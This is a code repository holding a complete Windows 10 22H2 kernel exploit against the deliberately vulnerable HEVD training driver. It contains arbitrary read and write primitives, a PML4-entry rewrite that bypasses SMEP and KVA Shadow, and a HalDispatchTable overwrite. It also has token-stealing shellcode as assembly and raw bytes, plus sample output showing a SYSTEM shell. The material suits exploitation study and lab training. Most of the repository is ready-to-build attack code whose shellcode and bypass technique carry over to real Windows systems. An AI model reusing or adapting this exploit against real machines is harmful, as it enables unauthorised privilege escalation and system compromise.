├── .gitignore ├── shellcode ├── SetR13.asm └── TokenSteal.asm ├── util ├── hex.py └── parse_pml4e.py ├── README.md └── HEVD_ArbitraryOverwrite.c /.gitignore: -------------------------------------------------------------------------------- 1 | *.exe 2 | *.obj 3 | *.bin 4 | -------------------------------------------------------------------------------- /shellcode/SetR13.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global SetR13 3 | section .text 4 | 5 | SetR13: 6 | mov r13, rcx ; Set the 1st argument to r13 7 | ret 8 | -------------------------------------------------------------------------------- /util/hex.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | TAB = 4 4 | MAX_LINE_LENGTH = 80 5 | 6 | with open(sys.argv[1], "rb") as file: 7 | data = file.read() 8 | 9 | print(f"// size: {len(data)}") 10 | print("unsigned char rawShellcode[] = {") 11 | 12 | formatted_hex = [f"0x{byte:02x}" for byte in data] 13 | line = " " * TAB 14 | 15 | for hex_value in formatted_hex: 16 | if len(line + hex_value + ",") > MAX_LINE_LENGTH: 17 | print(line.rstrip()) 18 | line = " " * TAB 19 | line += hex_value + ", " 20 | 21 | print(line.rstrip(", ") + "\n};") 22 | -------------------------------------------------------------------------------- /util/parse_pml4e.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | def parse_pml4e(pml4e): 5 | # ref: https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html 6 | bit_descriptions = { 7 | 0: "Present", 8 | 1: "Read/Write", 9 | 2: "User/Supervisor", 10 | 3: "Page-Level Write-Through", 11 | 4: "Page-Level Cache Disable", 12 | 5: "Accessed", 13 | 63: "Execute Disable", 14 | } 15 | 16 | output = [] 17 | output.append(f"PML4E: {pml4e:064b}") 18 | 19 | for bit in bit_descriptions: 20 | status = "Set" if (pml4e >> bit) & 1 else "Not Set" 21 | output.append(f"Bit {bit:2}: {bit_descriptions[bit]:30} - {status}") 22 | 23 | pfn = (pml4e >> 12) & 0xFFFFFFFFFF 24 | output.append(f"Physical Frame Number (PFN): {pfn:#x}") 25 | 26 | return "\n".join(output) 27 | 28 | 29 | def main(): 30 | parser = argparse.ArgumentParser() 31 | parser.add_argument( 32 | "pml4e", help="PML4E in hexadecimal format.", type=lambda x: int(x, 16) 33 | ) 34 | args = parser.parse_args() 35 | 36 | try: 37 | parsed_pml4e = parse_pml4e(args.pml4e) 38 | print(parsed_pml4e) 39 | except ValueError as e: 40 | print(f"Error: {e}") 41 | 42 | 43 | if __name__ == "__main__": 44 | main() 45 | -------------------------------------------------------------------------------- /shellcode/TokenSteal.asm: -------------------------------------------------------------------------------- 1 | BITS 64 2 | global _start 3 | section .text 4 | SYSTEM_PID equ 0x04 5 | ; nt!_KPCR 6 | Prcb equ 0x180 7 | ; nt!_KPRCB 8 | CurrentThread equ 0x08 9 | ; nt!_KTHREAD 10 | ApcState equ 0x98 11 | ; nt!_KAPC_STATE 12 | Process equ 0x20 13 | ; nt!_EPROCESS 14 | UniqueProcessId equ 0x440 15 | ActiveProcessLinks equ 0x448 16 | Token equ 0x4b8 17 | 18 | _start: 19 | ; Retrieve a pointer to _ETHREAD from KPCR 20 | mov rdx, qword [gs:Prcb + CurrentThread] 21 | 22 | ; Obtain a pointer to CurrentProcess 23 | mov r8, [rdx + ApcState + Process] 24 | 25 | ; Move to the first process in the ActiveProcessLinks list 26 | mov rcx, [r8 + ActiveProcessLinks] 27 | 28 | .loop_find_system_proc: 29 | ; Get the UniqueProcessId 30 | mov rdx, [rcx - ActiveProcessLinks + UniqueProcessId] 31 | 32 | ; Check if UniqueProcessId matches the SYSTEM process ID 33 | cmp rdx, SYSTEM_PID 34 | jz .found_system ; IF (SYSTEM process is found) 35 | 36 | ; Move to the next process 37 | mov rcx, [rcx] 38 | jmp .loop_find_system_proc ; Continue looping until the SYSTEM process is found 39 | 40 | .found_system: 41 | ; Retrieve the token of the SYSTEM process 42 | mov rax, [rcx - ActiveProcessLinks + Token] 43 | 44 | ; Mask the RefCnt (lower 4 bits) of the _EX_FAST_REF structure 45 | and al, 0xF0 46 | 47 | ; Replace the CurrentProcess's token with the SYSTEM process's token 48 | mov [r8 + Token], rax 49 | 50 | ; Clear r13 register 51 | xor r13, r13 52 | 53 | ret 54 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HackSys Extreme Vulnerable Driver (HEVD) - Arbitrary Overwrite Exploit 2 | 3 | ## Introduction 4 | 5 | This repository contains an exploit for [HackSys Extreme Vulnerable Driver (HEVD)](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver) that bypasses [KVA Shadow](https://msrc.microsoft.com/blog/2018/03/kva-shadow-mitigating-meltdown-on-windows/), a mitigation for the Meltdown vulnerability. 6 | 7 | 8 | ## Exploit Overview 9 | 10 | The exploit leverages [an Arbitrary Overwrite vulnerability in HEVD](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/b02b6ea/Driver/HEVD/Windows/ArbitraryWrite.c#L112), modifying the PML4 entry to bypass both KVA Shadow and SMEP. 11 | 12 | For a detailed explanation and walkthrough of this exploit, see my blog post: [Windows Kernel Exploitation — HEVD on Windows 10 22H2](https://medium.com/@ommadawn46/windows-kernel-exploitation-hevd-on-windows-10-22h2-b407c6f5b8f7). 13 | 14 | 15 | ## Tested Environment 16 | 17 | This exploit was tested in the following environment: 18 | 19 | - Windows 10 Version 22H2 (OS Build 19045.3930) 20 | - KVA Shadow: Enabled 21 | - VBS/HVCI: Disabled 22 | - Integrity Level: Medium 23 | 24 | 25 | ### Sample Output 26 | 27 | ``` 28 | C:\Users\debuggee>HEVD_ArbitraryOverwrite.exe 29 | HackSys Extreme Vulnerable Driver (HEVD) - Arbitrary Overwrite Exploit 30 | Windows 10 Version 22H2 (OS Build 19045.3930) with KVA Shadow enabled 31 | ----- 32 | 33 | [*] Executable shellcode: 000002846A110000 34 | [+] HEVD device handle: 0000000000000098 35 | [+] Kernel base address: FFFFF80560A00000 36 | [+] NtQueryIntervalProfile: 00007FF8C704FA00 37 | 38 | [*] Leaking virtual address of shellcode's PML4 entry... 39 | [!] Writing: *(000000BF51BBFC60) = *(FFFFF80560C6B573) 40 | [*] Leaked PTE virtual address: FFFF940000000000 41 | [*] Extracted PML4 Self Reference Entry index: 128 42 | [*] Extracted shellcode's PML4 index: 005 43 | [*] Calculated virtual address for shellcode's PML4 entry: FFFF944A25128028 44 | 45 | [*] Modifying shellcode's PML4 entry to bypass SMEP and KVA Shadow... 46 | [!] Writing: *(000000BF51BBFC70) = *(FFFF944A25128028) 47 | [*] Leaked shellcode's PML4 entry: 8A0000015F3D5867 48 | [*] Modified shellcode's PML4 entry: 0A0000015F3D5863 49 | [!] Writing: *(FFFF944A25128028) = *(000000BF51BBFCB8) 50 | [*] Overwrote PML4 entry to make shellcode executable in kernel mode 51 | 52 | [*] Modifying HalDispatchTable+0x8 for shellcode execution... 53 | [!] Writing: *(000000BF51BBFC70) = *(FFFFF80561600A68) 54 | [*] Leaked HalDispatchTable+0x8: FFFFF80561392EF0 55 | [!] Writing: *(FFFFF80561600A68) = *(000000BF51BBFCE0) 56 | [*] Overwrote HalDispatchTable+0x8 to gain control flow 57 | 58 | [*] Executing shellcode... 59 | [*] Executable SetR13 function allocated at: 000002846A240000 60 | [*] Setting R13 to shellcode's address 61 | [*] Calling NtQueryIntervalProfile to execute shellcode 62 | 63 | [*] Restoring the kernel state... 64 | [!] Writing: *(FFFF944A25128028) = *(000000BF51BBFCF8) 65 | [!] Writing: *(FFFFF80561600A68) = *(000000BF51BBFD00) 66 | 67 | [+] Spawning a shell with SYSTEM privilege 68 | ``` 69 | 70 | ``` 71 | Microsoft Windows [Version 10.0.19045.3930] 72 | (c) Microsoft Corporation. All rights reserved. 73 | 74 | C:\Users\debuggee>whoami 75 | nt authority\system 76 | ``` 77 | 78 | 79 | ## Build 80 | 81 | To build the exploit, execute the following command in [x64 Native Tools Command Prompt](https://learn.microsoft.com/cpp/build/how-to-enable-a-64-bit-visual-cpp-toolset-on-the-command-line?view=msvc-170): 82 | 83 | ``` 84 | cl.exe HEVD_ArbitraryOverwrite.c 85 | ``` 86 | 87 | 88 | ## Verifying KVA Shadow Status 89 | 90 | To verify if KVA Shadow is active on your system, use [SpecuCheck](https://github.com/ionescu007/SpecuCheck): 91 | 92 | ``` 93 | C:\Users\debuggee>SpecuCheck.exe 94 | SpecuCheck v1.1.1 -- Copyright(c) 2018 Alex Ionescu 95 | https://ionescu007.github.io/SpecuCheck/ -- @aionescu 96 | -------------------------------------------------------- 97 | 98 | Mitigations for CVE-2017-5754 [rogue data cache load] 99 | -------------------------------------------------------- 100 | [-] Kernel VA Shadowing Enabled: yes 101 | ├───> Unnecessary due lack of CPU vulnerability: no 102 | ├───> With User Pages Marked Global: no 103 | ├───> With PCID Support: yes 104 | └───> With PCID Flushing Optimization (INVPCID): yes 105 | ... 106 | ``` 107 | 108 | 109 | ## Disclaimer 110 | 111 | This code is provided for educational purposes only. Use it responsibly and only on systems you have permission to test. 112 | -------------------------------------------------------------------------------- /HEVD_ArbitraryOverwrite.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/b02b6ea/Driver/HEVD/Windows/HackSysExtremeVulnerableDriver.h#L84 7 | #define HEVD_IOCTL_ARBITRARY_WRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS) 8 | 9 | // https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/b02b6ea/Driver/HEVD/Windows/ArbitraryWrite.h#L63-L67 10 | typedef struct _WRITE_WHAT_WHERE 11 | { 12 | PULONG_PTR What; 13 | PULONG_PTR Where; 14 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 15 | 16 | // HEVD Kernel Write Primitive 17 | BOOL ArbitraryWrite(HANDLE hHevd, PVOID where, PVOID what) 18 | { 19 | // https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/b02b6ea/Driver/HEVD/Windows/ArbitraryWrite.c#L112 20 | printf("[!] Writing: *(%p) = *(%p)\n", where, what); 21 | 22 | PWRITE_WHAT_WHERE payload = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WRITE_WHAT_WHERE)); 23 | payload->What = (PULONG_PTR)what; 24 | payload->Where = (PULONG_PTR)where; 25 | 26 | DWORD lpBytesReturned; 27 | return DeviceIoControl( 28 | hHevd, 29 | HEVD_IOCTL_ARBITRARY_WRITE, 30 | payload, 31 | sizeof(WRITE_WHAT_WHERE), 32 | NULL, 33 | 0, 34 | &lpBytesReturned, 35 | NULL 36 | ); 37 | } 38 | 39 | // HEVD Kernel Read Primitive 40 | PVOID ArbitraryRead(HANDLE hHevd, PVOID addr) 41 | { 42 | // Achieve ArbitraryRead by utilizing ArbitraryWrite. The ArbitraryWrite function is called 43 | // with a pointer to a buffer (readBuf) as the 'where' parameter, and the target read address 44 | // 'addr' as the 'what' parameter. This effectively reads the data from 'addr' into readBuf. 45 | PVOID readBuf; 46 | ArbitraryWrite(hHevd, &readBuf, addr); 47 | return readBuf; 48 | } 49 | 50 | // Get the device handle for HEVD 51 | HANDLE GetHevdDeviceHandle() 52 | { 53 | HANDLE hHevd = CreateFileA( 54 | "\\\\.\\HackSysExtremeVulnerableDriver", 55 | GENERIC_READ | GENERIC_WRITE, 56 | 0, 57 | NULL, 58 | OPEN_EXISTING, 59 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 60 | NULL 61 | ); 62 | 63 | if (hHevd == INVALID_HANDLE_VALUE) 64 | { 65 | printf("[-] Driver handle: 0x%p\n", hHevd); 66 | printf("[-] Failed to acquire handle to the driver.\n"); 67 | exit(1); 68 | } 69 | 70 | return hHevd; 71 | } 72 | 73 | // Retrieve the base address of ntoskrnl.exe 74 | PVOID GetKernelBaseAddress() 75 | { 76 | LPVOID drivers[1024]; 77 | DWORD cbNeeded; 78 | EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded); 79 | return drivers[0]; 80 | } 81 | 82 | // Retrieve the address of the NtQueryIntervalProfile function 83 | FARPROC GetNtQueryIntervalProfile() 84 | { 85 | HMODULE ntdll = GetModuleHandle("ntdll"); 86 | return GetProcAddress(ntdll, "NtQueryIntervalProfile"); 87 | } 88 | 89 | // Add an offset to a pointer 90 | PVOID AddOffsetToPointer(PVOID ptr, size_t offset) 91 | { 92 | return (PVOID)((uintptr_t)ptr + offset); 93 | } 94 | 95 | // Allocate an executable memory area and copy code into it 96 | PVOID AllocExecutableCode(PVOID rawCode, size_t size) 97 | { 98 | PVOID executableCode = VirtualAlloc( 99 | NULL, 100 | size, 101 | MEM_COMMIT | MEM_RESERVE, 102 | PAGE_EXECUTE_READWRITE 103 | ); 104 | RtlMoveMemory(executableCode, rawCode, size); 105 | return executableCode; 106 | } 107 | 108 | // Extract the PML4 entry index from a virtual address 109 | unsigned int ExtractPml4Index(PVOID address) 110 | { 111 | return ((uintptr_t)address >> 39) & 0x1ff; 112 | } 113 | 114 | // Calculate the virtual address of the PML4 entry 115 | PVOID CalculatePml4VirtualAddress(unsigned int pml4SelfRefIndex, unsigned int pml4Index) 116 | { 117 | uintptr_t address = 0xffff; 118 | address = (address << 0x9) | pml4SelfRefIndex; // PML4 Index 119 | address = (address << 0x9) | pml4SelfRefIndex; // PDPT Index 120 | address = (address << 0x9) | pml4SelfRefIndex; // PDT Index 121 | address = (address << 0x9) | pml4SelfRefIndex; // PT Index 122 | address = (address << 0xC) | pml4Index * 8; // Physical Address Offset 123 | return (PVOID)address; 124 | } 125 | 126 | // Modify the PML4 entry to be executable in kernel mode 127 | uintptr_t ModifyPml4EntryForKernelMode(uintptr_t originalPml4Entry) 128 | { 129 | uintptr_t modifiedPml4Entry = originalPml4Entry; 130 | modifiedPml4Entry &= ~((uintptr_t)1 << 2); // Clear U/S bit (Kernel Mode) 131 | modifiedPml4Entry &= ~((uintptr_t)1 << 63); // Clear XD bit (Executable) 132 | return modifiedPml4Entry; 133 | } 134 | 135 | // Exploit Part 1: Leak the PML4 virtual address of shellcode 136 | PVOID LeakShellcodePml4VirtualAddress(HANDLE hHevd, PVOID miGetPteAddress13_Address, PVOID shellcode) 137 | { 138 | PVOID pteVirtualAddress = ArbitraryRead(hHevd, miGetPteAddress13_Address); 139 | printf("[*] Leaked PTE virtual address: %p\n", pteVirtualAddress); 140 | 141 | unsigned int pml4SelfRef_Index = ExtractPml4Index(pteVirtualAddress); 142 | printf("[*] Extracted PML4 Self Reference Entry index: %03x\n", pml4SelfRef_Index); 143 | 144 | unsigned int pml4Shellcode_Index = ExtractPml4Index(shellcode); 145 | printf("[*] Extracted shellcode's PML4 index: %03x\n", pml4Shellcode_Index); 146 | 147 | PVOID pml4Shellcode_VirtualAddress = CalculatePml4VirtualAddress(pml4SelfRef_Index, pml4Shellcode_Index); 148 | printf("[*] Calculated virtual address for shellcode's PML4 entry: %p\n", pml4Shellcode_VirtualAddress); 149 | 150 | return pml4Shellcode_VirtualAddress; 151 | } 152 | 153 | // Exploit Part 2: Bypass SMEP and KVA Shadow 154 | uintptr_t BypassSMEPandKVAS(HANDLE hHevd, PVOID pml4Shellcode_VirtualAddress) 155 | { 156 | uintptr_t originalPml4Shellcode_Entry = (uintptr_t)ArbitraryRead(hHevd, pml4Shellcode_VirtualAddress); 157 | printf("[*] Leaked shellcode's PML4 entry: %p\n", (PVOID)originalPml4Shellcode_Entry); 158 | 159 | uintptr_t modifiedPml4Shellcode_Entry = ModifyPml4EntryForKernelMode(originalPml4Shellcode_Entry); 160 | printf("[*] Modified shellcode's PML4 entry: %p\n", (PVOID)modifiedPml4Shellcode_Entry); 161 | 162 | ArbitraryWrite(hHevd, pml4Shellcode_VirtualAddress, &modifiedPml4Shellcode_Entry); 163 | printf("[*] Overwrote PML4 entry to make shellcode executable in kernel mode\n"); 164 | 165 | return originalPml4Shellcode_Entry; 166 | } 167 | 168 | // Exploit Part 3: Overwrite a function pointer 169 | PVOID OverwriteFunctionPointer(HANDLE hHevd, PVOID halDispatchTable8_Address, PVOID jmpR13_Address) 170 | { 171 | PVOID originalHalDispatchTable8 = ArbitraryRead(hHevd, halDispatchTable8_Address); 172 | printf("[*] Leaked HalDispatchTable+0x8: %p\n", originalHalDispatchTable8); 173 | 174 | ArbitraryWrite(hHevd, halDispatchTable8_Address, &jmpR13_Address); // jmp r13 175 | printf("[*] Overwrote HalDispatchTable+0x8 to gain control flow\n"); 176 | 177 | return originalHalDispatchTable8; 178 | } 179 | 180 | // Exploit Part 4: Hijack control flow 181 | void HijackControlFlow(PVOID shellcode, FARPROC ntQueryIntervalProfileFunc) 182 | { 183 | // SetR13.asm 184 | unsigned char rawSetR13[] = { 185 | 0x49, 0x89, 0xcd, 0xc3 186 | }; 187 | PVOID executableSetR13 = AllocExecutableCode(rawSetR13, sizeof(rawSetR13)); 188 | printf("[*] Executable SetR13 function allocated at: %p\n", executableSetR13); 189 | 190 | printf("[*] Setting R13 to shellcode's address\n"); 191 | ((void (*)(PVOID))executableSetR13)(shellcode); 192 | 193 | printf("[*] Calling NtQueryIntervalProfile to execute shellcode\n"); 194 | ULONG dummy = 0; 195 | ntQueryIntervalProfileFunc(2, &dummy); 196 | } 197 | 198 | // Execute arbitrary code 199 | void ExecuteShellcode( 200 | PVOID shellcode, 201 | HANDLE hHevd, 202 | PVOID halDispatchTable8_Address, 203 | PVOID miGetPteAddress13_Address, 204 | PVOID jmpR13_Address, 205 | FARPROC ntQueryIntervalProfileFunc 206 | ) 207 | { 208 | puts("\n[*] Leaking virtual address of shellcode's PML4 entry..."); 209 | PVOID pml4Shellcode_VirtualAddress = LeakShellcodePml4VirtualAddress(hHevd, miGetPteAddress13_Address, shellcode); 210 | 211 | puts("\n[*] Modifying shellcode's PML4 entry to bypass SMEP and KVA Shadow..."); 212 | uintptr_t originalPml4Shellcode_Entry = BypassSMEPandKVAS(hHevd, pml4Shellcode_VirtualAddress); 213 | 214 | puts("\n[*] Modifying HalDispatchTable+0x8 for shellcode execution..."); 215 | PVOID originalHalDispatchTable8 = OverwriteFunctionPointer(hHevd, halDispatchTable8_Address, jmpR13_Address); 216 | 217 | puts("\n[*] Executing shellcode..."); 218 | HijackControlFlow(shellcode, ntQueryIntervalProfileFunc); 219 | 220 | puts("\n[*] Restoring the kernel state..."); 221 | ArbitraryWrite(hHevd, pml4Shellcode_VirtualAddress, &originalPml4Shellcode_Entry); 222 | ArbitraryWrite(hHevd, halDispatchTable8_Address, &originalHalDispatchTable8); 223 | 224 | puts(""); 225 | } 226 | 227 | // Perform privilege escalation 228 | void PrivilegeEscalation() 229 | { 230 | const size_t HalDispatchTable8_Offset = 0xc00a68; 231 | const size_t MiGetPteAddress13_Offset = 0x26b573; 232 | const size_t JmpR13_Offset = 0x80d5db; 233 | 234 | // TokenSteal.asm 235 | unsigned char rawShellcode[] = { 236 | 0x65, 0x48, 0x8b, 0x14, 0x25, 0x88, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x82, 237 | 0xb8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x88, 0x48, 0x04, 0x00, 0x00, 0x48, 238 | 0x8b, 0x51, 0xf8, 0x48, 0x83, 0xfa, 0x04, 0x74, 0x05, 0x48, 0x8b, 0x09, 239 | 0xeb, 0xf1, 0x48, 0x8b, 0x41, 0x70, 0x24, 0xf0, 0x49, 0x89, 0x80, 0xb8, 240 | 0x04, 0x00, 0x00, 0x4d, 0x31, 0xed, 0xc3 241 | }; 242 | PVOID executableShellcode = AllocExecutableCode(rawShellcode, sizeof(rawShellcode)); 243 | printf("[*] Executable shellcode: %p\n", executableShellcode); 244 | 245 | HANDLE hHevd = GetHevdDeviceHandle(); 246 | printf("[+] HEVD device handle: %p\n", hHevd); 247 | 248 | PVOID kernelBaseAddress = GetKernelBaseAddress(); 249 | printf("[+] Kernel base address: %p\n", kernelBaseAddress); 250 | 251 | FARPROC ntQueryIntervalProfileFunc = GetNtQueryIntervalProfile(); 252 | printf("[+] NtQueryIntervalProfile: %p\n", ntQueryIntervalProfileFunc); 253 | 254 | ExecuteShellcode( 255 | executableShellcode, 256 | hHevd, 257 | AddOffsetToPointer(kernelBaseAddress, HalDispatchTable8_Offset), 258 | AddOffsetToPointer(kernelBaseAddress, MiGetPteAddress13_Offset), 259 | AddOffsetToPointer(kernelBaseAddress, JmpR13_Offset), 260 | ntQueryIntervalProfileFunc 261 | ); 262 | } 263 | 264 | int main(void) 265 | { 266 | puts("HackSys Extreme Vulnerable Driver (HEVD) - Arbitrary Overwrite Exploit"); 267 | puts("Windows 10 Version 22H2 (OS Build 19045.3930) with KVA Shadow enabled"); 268 | puts("-----\n"); 269 | 270 | PrivilegeEscalation(); 271 | 272 | puts("[+] Spawning a shell with SYSTEM privilege"); 273 | system("start cmd.exe"); 274 | 275 | return 0; 276 | } 277 | --------------------------------------------------------------------------------